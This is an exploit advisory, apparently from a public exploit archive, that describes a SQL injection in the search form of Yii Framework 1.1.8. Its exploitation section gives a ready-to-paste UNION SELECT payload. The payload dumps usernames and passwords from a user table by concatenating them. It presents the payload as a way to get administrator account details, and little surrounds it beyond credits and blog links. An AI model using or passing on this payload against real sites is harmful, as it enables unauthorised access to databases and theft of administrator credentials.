1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 |
# Exploit Title: Yii Framework - Search SQL Injection Vulnerability # Google Dork: No Dork # Date: 20/11/2012 # Exploit Author: Juno_okyo # Vendor Homepage: http://www.yiiframework.com/ # Software Link: http://www.yiiframework.com/download/ # Version: 1.1.8 (maybe another version) # ############################## ################################################################ Vulnerability: ############################################################################################## SQL Injection via search form. You can query to get some info about administrator account and something... ############################################################################################## Exploitation: ############################################################################################## ' UNION SELECT 1,group_concat(username,0x7c,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 fRom user-- - ############################################################################################## More Details: ############################################################################################## Website: http://junookyo.blogspot.com/ About Exploit: http://junookyo.blogspot.com/2012/11/yii-framework-search-sql-injection.html ############################################################################################## Great thanks to Juno_okyo and James - J2TeaM ############################################################################################## |